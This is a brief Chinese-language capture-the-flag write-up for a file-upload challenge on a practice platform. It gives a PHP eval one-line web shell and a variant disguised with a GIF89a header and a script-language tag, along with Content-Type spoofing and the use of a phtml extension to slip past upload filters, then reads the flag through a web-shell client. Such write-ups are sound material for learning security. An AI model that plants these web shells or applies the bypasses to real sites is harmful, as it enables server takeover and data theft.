首先进入网址
发现是文件上传
创建一个test.php文件,写入一句话木马<?php eval($_POST['b'])?>,然后上传
提示不是图片
抓个包,发现content-type不是图片类型
将其改成 image/png , 再重新放包,结果提示过滤了php
再尝试php3, pht也过滤
当尝试phtml,发现’<?'被过滤了
更换一句话木马为GIF89a? <script language="php">eval($_POST[b])</script>,再上传,显示成功
文件上传成功后,再查找文件保存目录,尝试访问http://e5aeb193-58fd-4114-be5f-9eebf791adcc.node4.buuoj.cn:81/upload,发现就是保存文件的目录
可以看到test.phtml已经上传上去了,尝试用蚁剑连接
连接成功,直接进入根目录,发现flag文件
双击flag文件,得到flag
标签:尝试,文件,极客,Upload,flag,2019,test,上传 From: https://www.cnblogs.com/smallhuang/p/17858087.html